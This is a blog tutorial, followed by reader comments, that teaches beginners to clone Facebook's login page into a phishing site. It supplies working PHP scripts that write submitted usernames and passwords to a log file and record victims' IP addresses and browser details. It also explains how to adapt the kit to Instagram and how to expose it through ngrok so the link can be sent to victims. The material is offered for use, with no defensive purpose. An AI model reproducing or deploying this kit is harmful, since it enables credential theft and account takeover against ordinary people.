Table of Contents
phishing page – In this article, I’m going to teach you how to create a phishing page for beginners. Now you think so many phishing tools are available on the web, so why do we need to create a phishing site. All tools are creator convenience so you can only use that page. but if you learn from this tutorial you can make any website a phishing page.
How to create a phishing page?
- Any Device
- Chrome Browser
- Get username and password
- Get User-Agent information
- Get OTP
Download HTML Index page of Target
First, we need to choose the target website. After that just go to that website. I choose the Facebook website.
Once you entered your target website, click right said mouse button to select the “view page source” option
Once you click the “view page source option“. it will open one new window and show all that website source
Now press Ctrl+A to copy the Facebook page source. After that past it to your notepad
After getting the page source in your notepad. press Ctrl+F to open the find bar on your notepad. then type Action= in the find bar
Now Remove the /login/privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjEwNzY3NTUzLCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D command and type login.php
After that save this facebook source file with the name login.html
Creating PHP file For Password Harvesting
Now we have to complete creating a Facebook phishing site but if we host this login.html file into our system it will not capture any data from the user so now we need to create a harvesting PHP script Therefore you follow the below steps.
First, you need to copy paste the below PHP code in your notepad.
<?php
header (‘Location: facebook.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
After that, you save this PHP file with the name login.php
If we need to create other website phishing pages means one small correction is there in the login.php file header section. the current login.php file header section is facebook.com. if you create an Instagram phishing page means you change that header value facebook.com to instagram.com
<?php
header (‘Location: instagram.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rnnnn”);
fclose($handle);
exit;
?>
Create a PHP file to get user-agent information
Now we completed creating a phishing page and creating a Password Harvesting script. After that, we need to create a user-agent information script so you follow the below steps.
Now we need to create another PHP file to capture victim “user-agent” information so you copy the below PHP code and past it to your notepad.
<?php
if (!empty($_SERVER[‘HTTP_CLIENT_IP’]))
{
$ipaddress = $_SERVER[‘HTTP_CLIENT_IP’].”rn”;
}
elseif (!empty($_SERVER[‘HTTP_X_FORWARDED_FOR’]))
{
$ipaddress = $_SERVER[‘HTTP_X_FORWARDED_FOR’].”rn”;
}
else
{
$ipaddress = $_SERVER[‘REMOTE_ADDR’].”rn”;
}
$useragent = ” User-Agent: “;
$browser = $_SERVER[‘HTTP_USER_AGENT’];
$file = ‘ip.txt’;
$victim = “IP: “;
$fp = fopen($file, ‘a’);
fwrite($fp, $victim);
fwrite($fp, $ipaddress);
fwrite($fp, $useragent);
fwrite($fp, $browser);
fclose($fp);
After that save this PHP file with the name ip.php
Connect all files into one file
Now we have three files ip.php, login.html, and login.php. therefore connect all files into one file. so only we can host this file.
Copy the below PHP command into your notepad
<?php
include ‘ip.php’;
header(‘Location: login.html’);
exit
?>
Now save these files with the name index.php
How to Host a phishing page
so many ways are there to host our phishing page but now I’m teaching you two simple methods.
- Local server hosting
- 000webhost hosting
Local server hosting
First, you open the terminal inside the phishing page’s and type this below command.
php -S localhost:4444
Now you will get a shareable link but this link only works on the same wifi network. if you need to share out of the network means to start the ngrok. so you minimize the current terminal and open a new one to start ngrok
Now share the ngrok link to your victim
Victim view
Once your victim clicks your link means that link will be shown in the below image.
If your victim types any data on your page.
That’s all data captured and show on your terminal.
Now you can create any website as a phishing site with this method. if you need more techniques tell me the command section.
All website phishing page
PASSWORD: www.errorsfind.com
[…] we need to access the Facebook page means we need to go for the http://www.facebook.com address. because only this address shows the […]
But using local Host method my site can only work when I am connected to the internet
[…] guys, Welcome to another article in this article we are going to discuss how to create your own phishing page with termux. This tool can make almost all biggest websites into HTTP phishing pages. This Weeman […]
[…] – We discussed lots of phishing tools but this one is the most advanced phishing tool. because the nexphisher tool has more […]
[…] article we are going to discuss the Nero phishing server tool This tool clone any website at a phishing page if you make any phishing page definitely you should know HTML programming or any other language […]
Bro this pass for zip file is wrong
Pass- http://www.errorsfind.com
try https://www.errorsfind.com
Correct zip pass : errorsfind.com
Bro please I need correct password
Non of this password is correct
yes